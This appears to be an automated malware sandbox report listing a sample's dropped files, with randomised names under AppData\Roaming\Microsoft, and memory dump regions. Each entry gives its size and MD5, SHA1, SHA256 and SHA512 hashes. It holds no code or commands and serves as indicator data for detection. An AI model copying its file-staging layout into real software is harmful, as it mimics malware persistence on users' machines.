af4227245f231a117a1d36fcabb361b4d3446736e0529cd6c9843f456831b698

SHA512
f52f35a4ab9317fa747fb88e4a41e379da7f9b970b20b42a35671a61b66745823a84b7caffcfeebb5cd3cbc4236bc057461c7231297ea1c8284341de63e9ed98

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\GdxPXJwhIvg.zYNFRBuGLjXspKro

Filesize
180KB

MD5
4dcc43f6744dec3ad85a0895b306ab21

SHA1
a1f0a9167c0b2011c436f9e7aa2f92af7f9fe254

SHA256
70059c32998d351b808e34da5b6c8b2dd55fb6f61752e1a06e8433ac2ce807ce

SHA512
d8355059241ee1f06979e0ad36bf80a67e5eada15e30f09a2b954cda836fbd53bfdeeb083365a83745579232e61e2b550d53007404bb7b8e60e1c523d0b10eb5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\IBVqgmLwoKc.urqkXgniOtZ

Filesize
173KB

MD5
7bc7a5a57eb4a5d207ec963773082599

SHA1
1a51a7bf71fa2a80309a718b0bdb98d961abe9ac

SHA256
cd78e7c1a437a247307fd1967ae7b52ee424d80ffe84b98c331fae88a52ab38b

SHA512
3e3487d259fff5a9bcdcb9ac04f3e6feb93a6fe834df46eb92ca7b197ef805b98163745b662975ae33a4d149a8aabad3ef1b8ce289896e54ad01db077b3fafd4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\RvdkCEMVGBiZjo.tlhngUvYqJKDXOwHBm

Filesize
133KB

MD5
6a5f2ccc2e3407416bfbe8ea0affb35b

SHA1
cb8d6ed5b46c0f7567b8233a1ccd1dbad37b6d26

SHA256
399eaed14cd785160d026bbfefb227215898aafdd5dbb9d561ef236295dbefec

SHA512
0487c368114d130ac5d62e136e2a9c1515555227d3695b6178bb9a0fe5ac16a066fd7a234abb7558ca0462b8587fee42374490375b6131e22bd820d4659224f5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\TWbDoBVvGwLZjAtpP.sVZvToNSuHilg

Filesize
147KB

MD5
cb841704a8c3903c4ed9dc78beca8cb1

SHA1
e025d054e761b577ebf196f1bb83bf20a005537b

SHA256
f3afbacc287c2c64202d728a88b0db5e07f6308e7e7221a6de5af6f3a8c06f52

SHA512
4e41aed528c1abc965dd0eea06ddcb7bfa0572cef14f58e81224f37965dbfe0ed81a2cf0cf036ceab6cc5c97c23a165196275fbc2b472a496f5ca754cb81dcee

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\TiJZLCSvgNpMXw.ehfcsIFpCuqadnrDSAx

Filesize
182KB

MD5
576eca15ed3994fb20b9d246e562eb7d

SHA1
5c4247ade94ce1d21d7c58ebbe6c57cc2f603b0f

SHA256
5a30ce3d79355901e17dbf1312f49444b0e0ad833e69ec54313da572af4631e3

SHA512
74eb16f66811dd9395fa756d28ebe8a534406560a685ae784bd609fb2e9c84f9dd7b94d1391d19d3d6b7215a66a0638aec170b05bdf51433e621e31c1163239c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\WMhOPQoTdC.cyQENUADZlapxSq

Filesize
181KB

MD5
82476cfc35cee4a05aae0d0438286c07

SHA1
2db017585b956ef20e8982bd88920e4812cd2631

SHA256
5f6f0f34adcd68b3422ef3a0051fe325f8e025f0527524e4c73b7784629be625

SHA512
0b49e5071b1232918b0ddf6e461c4849f4c9dd7d6e8f812927275617e7d0dae5eead7ad53878f305d01bd68f3ef6fad92bccaa5155374afe806d948b35acf7a4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\XhpiwdqScgRKNTaYrx.mSbuFQrZTKIg

Filesize
62KB

MD5
e53072b9993836e31e0f4693e01f300b

SHA1
0ebcdeb97c54c026fdce904526de58d3d5287944

SHA256
2b806b4115ff29e61ad09579b25e4ecdec45aaae37ef0b513371edb4edff2686

SHA512
17ad2cdd60929f79738f7e6b339886f7a4ffed92e08c41d9bb85689581508a41f6fbe9899daebb8c1a91418bb18f7b1a0926a2dcb93cb6096be9a3364b86abe9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\cjeynCpSMxlzoGXwH.fJgQjhnyqLTeIKWzP

Filesize
84KB

MD5
c0ee81bcee4aebb88d5b5485d240ea3b

SHA1
cb4800b091392499d131c2a2386528203dcd6500

SHA256
d94265a61d56cde16a258b3b6ed6aefe427cc908894dee02ac1d0fa0eabdfde9

SHA512
34421b08ed18e2290a75db8d7d0dc86212d0eaf97c339aef9deba305d60d3b861f2fe4d0278e9240fa24fbc1f91b442c360f93a2604055c3fb41ff81a66ac4fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\eTCpFbiVjQUOZRS.wInLZEvJCjHkc

Filesize
82KB

MD5
c4f94720a2c4cf6183c871da4be38f02

SHA1
ab7a2fc8733948559991051a45b89c22c0103597

SHA256
7c8d321e30d43d5d5f99cb2a230c32360930326d9e5dcc57a11d593d12ff328d

SHA512
c49e60110c08176d75caecf872d1ad02d7754fb22e542c39df224c5e0ee18dd2c0e4945351cf57117d89c580ba93938a9d73ba4a2fac40fd7a9aa7b421df0d13

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\fHTXuxArNJtoeMny.QvPSOgRkjE

Filesize
101KB

MD5
94a51977d849103d749b93873f7a9ec4

SHA1
48626151c96ed11e41c5d63baf78dc9b63586326

SHA256
c38b0f3da41f307907d5b75e81f1fa8932e826f05ef360c6ba2b7f54d2f3a5a1

SHA512
3c6b0856ae61d75475b3e00b3b5a8f55e1e8bbb1e82fd2af828d52cade407fa1a13cfb503bd22ee9e382249dfba218e6fe20644ba14c35b2be9a4df11a258344

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\fYROEbwVjgBsHPLDyvo.youpmzRxik

Filesize
143KB

MD5
d955fc9f22801b5bdeb19f7ad4a883a3

SHA1
660452e78159279e0e73fbefee1f39cd759c7fd2

SHA256
5e6da3f4f53ac6db1fe01b8b690ca2c6b769cdbcf4186109b8e6fe1ba36dd5d0

SHA512
48f1ffba4eeb183b6ac9372720986faa9abc94c7a018f6f0290d80b42afe12c5d10efd3e707ecfbde9212746bec914991c279f7cb19a7d2899758b7a229fa740

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\fgRCAGZHcKOoI.qHETmgGQAoRuwbDcNyX

Filesize
139KB

MD5
4e303341c13ffe6c74ca548121a18afd

SHA1
95f9fcbbe4f379ba6196ff10f0a6383dd5b1b338

SHA256
5635c57355a8a385078c7fb47fb7e9f61b8d1460855f1ed19667c3174d03cbfc

SHA512
cc613b71622f16a09f100454f0a271aed6d47ca8efeb68b04c2f7bdf32caf8941c9998e5f839b38df4f7b80980b0b4d18163c582cbbd0465afb6f2475af7ad9c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\iNmqajKdQATkvH.cALgUQBVjsTrwXWkZt

Filesize
58KB

MD5
0542fcf3998bf0ce5fe23ecad81f3e2a

SHA1
33ab4a887253100767e1706f185be8224c0750ce

SHA256
53d5ae30232487ddc02bc49ab30e7b93faa35a70e4bdfd5f8545896342da2c02

SHA512
8dad3fbb620b9b6a2c0c62dafec2ae0dee1b46407cad9636c653d351340f9468fd2fb509082afa1b35d51e83a2facaec33e4b89717fc91d599e59ab114310dfe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\nGsdwcBfiHoPAphFYEl.UTKGMoCsWv

Filesize
60KB

MD5
e31466d4231df779f4b69d8d2e0cd62e

SHA1
07e57caf9aed8c101529b3ebf7f3534c1f527314

SHA256
b62104412f4c4059e4a8bf1d657d8dce3538081830b3b9429c1f4d1c34d68cea

SHA512
a318a8e57263f8e26eba601e0e5dab25e7e501f07ed60bed605b2700247c75173d9c3b1a04b2d2bb75403dfac7f6dacd247017c1134636171d7e68420f3f6ad9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\qsxDmzclipL.PEqzBwlONskZGieUYJ

Filesize
101KB

MD5
ddcaaa5bac6f7df10d8827c24b283070

SHA1
8be535cff32a409a86ee339e85f9771894e2f458

SHA256
af47e01993dbfff7e8eaf8e55d6acb0e867d5adff2a7c16d7e4314a6a5ca35fd

SHA512
4523d82df4f6edf05ce7192762de7a349d58ad29b7b7d962c08f9070f4998adeef770471b5cbe005495da983114e2182d1a18565eff2af6a8d9d0335d3f78a55

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\rAxMighRWOtop.rbqlafENGjZu

Filesize
188KB

MD5
e82528ed11a536dab1a1f3dfc62d115e

SHA1
7d85c9586b3d4b6f6eda51b25bac41defcfd79fb

SHA256
687a30cba41037cee801e5ef1e0193963fccd7695712f13b0abcc8088090cfbb

SHA512
f2d7c43364416a33eba956cb6cbe41253a9471b16c9a0412767deccc26d8715b40e6b749dfa223b0cdb353788a3cde23d7d5e566e0c9d74e7f2abac8d8b33b52

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\rwzMGCUaXsJmftSIg.TfxitXJMmrSwWsh

Filesize
183KB

MD5
3aa6179dc8cade7e83d922efea4b9df4

SHA1
20f99c77f4b3744e70c4e1d98175e32560f39398

SHA256
986ccfe181c87b52836a5af2524e06c05bd9ab8c890799d8f4c47f8cfe05f5e6

SHA512
05fb25cc733485c784a6ebd80e2dfad6aeeb913fd7c645b1df716da86ccf1b9f5ae6b87ddf6fa39c2f767ad7cf563f60dac249cc45e4e5b1e517f6fa5e248cc0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\smQLeXPihIcAHplarvT.YfLeXGlpPqsWyDwvc

Filesize
118KB

MD5
50936db9519999f25cc92c0e8325e1da

SHA1
0a56b8fe72172c12b0663dc9c2d2325b34d8d952

SHA256
d174b00913d7dba545e884d75f6cce754d26b740e82fe7327bece505a599e464

SHA512
9b1b6f5a2030318f58f3a45e46456f031d688cf053008900f3c254075bacf0ab760544b77038952a30a7e40d3932a9e12814427069611d1fc9b8de37333111c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\suHcKIvSmzXrTfC.diZXVoDzpy

Filesize
74KB

MD5
e7d25696245eb647a0b69dc4ba49516f

SHA1
5c9364ae38321ecb1c593518e029ad03221961a5

SHA256
23239a0d1d63517398b02265d00a7ef9cef66e66c90748ef327840ac58a85d1d

SHA512
66ed780eeff0cc0859e0936891fbf7e4328d91193e6f189988332a8df866d12ad5d136676678f2c59643614bdb03b52f062cd9582df1d0fcb16ebe1cb07a940a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\imjauHzOypkEMrXn\vOlGbrTZwshp.QHjrKckuPUGvyAlspbO

Filesize
165KB

MD5
1ce89e36f3b246a978200b526def13dc

SHA1
052f112bb901bb386440389e9839c1ad39ea4da5

SHA256
4d2444acff213b697735b2288ef0b21ef7d81384435dc52c740c3203ae88469b

SHA512
2194df8ebd5af9bd963093b8c7ae8763e7a2ab8dc3e74d0a752f244cc9e5a00c53fe929059036d118d7823898eb549ede3a93c7c5f4a5ad3e7ceec0f6fdc15f6

Download Submit
C:\Users\Admin\da2bbd7ef028e1e821d69bbd23d51221\cd60c5937b1fcc7213d45816bfd13fe7\7b66c9556c2ec989215d843039b3b1a0\cfc7af7400797654a5097e937584876e\43ee4f5abd30d3a2d03bbc2e7afaf3ee\1a15595747bc44e2593101e2d537d190\c9b166feaa1d05cb17157e3f1373b46d

Filesize
100KB

MD5
5decfd461b69e47eda107fd7cc9f120c

SHA1
244e4adb99b84e782eed7c9ebbd65ab21a71bda6

SHA256
015997aa921fde720be90e7ad62024d7c5fa938221113c81345ffadc41c755d7

SHA512
2aa380d51f9d8a3bd670f53f1226a26075b651085e99b07473a3ee7c316b07301b5e706d41562aa05e971fe910295e3d074e34fd854e08e522db1118055e200a

Download Submit
memory/1168-679-0x0000000074DE0000-0x0000000074E04000-memory.dmp

Filesize
144KB

Download
memory/1168-680-0x0000000073540000-0x0000000073785000-memory.dmp

Filesize
2.3MB

Download
memory/1168-681-0x00000000739E0000-0x00000000739F4000-memory.dmp

Filesize
80KB

Download
memory/3500-167-0x0000000006FC0000-0x0000000007056000-memory.dmp

Filesize
600KB

Download
memory/3500-144-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/3500-169-0x0000000006570000-0x0000000006592000-memory.dmp

Filesize
136KB

Download
memory/3500-140-0x0000000002990000-0x00000000029C6000-memory.dmp

Filesize
216KB

Download
memory/3500-141-0x00000000052A0000-0x00000000058C8000-memory.dmp

Filesize
6.2MB

Download
memory/3500-489-0x0000000004D50000-0x0000000004D64000-memory.dmp

Filesize
80KB

Download
memory/3500-170-0x0000000007610000-0x0000000007BB4000-memory.dmp

Filesize
5.6MB

Download
memory/3500-157-0x0000000006020000-0x000000000606C000-memory.dmp

Filesize
304KB

Download
memory/3500-156-0x0000000005FF0000-0x000000000600E000-memory.dmp

Filesize
120KB

Download
memory/3500-171-0x0000000008240000-0x00000000088BA000-memory.dmp

Filesize
6.5MB

Download
memory/3500-154-0x00000000059F0000-0x0000000005D44000-memory.dmp

Filesize
3.3MB

Download
memory/3500-168-0x0000000006520000-0x000000000653A000-memory.dmp

Filesize
104KB

Download
memory/3500-143-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/3500-142-0x0000000004FD0000-0x0000000004FF2000-memory.dmp

Filesize
136KB

Download
memory/3552-155-0x0000000000400000-0x0000000000501000-memory.dmp

Filesize
1.0MB

Download
memory/3552-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/3552-166-0x0000000000400000-0x0000000000501000-memory.dmp

Filesize
1.0MB

Download
memory/3552-0-0x0000000000400000-0x0000000000501000-memory.dmp

Filesize
1.0MB

Download
memory/5000-160-0x0000000000400000-0x000000000073B000-memory.dmp

Filesize
3.2MB

Download
memory/5000-164-0x0000000000400000-0x000000000073B000-memory.dmp

Filesize
3.2MB

Download
memory/5000-6-0x0000000000400000-0x000000000073B000-memory.dmp

Filesize
3.2MB

Download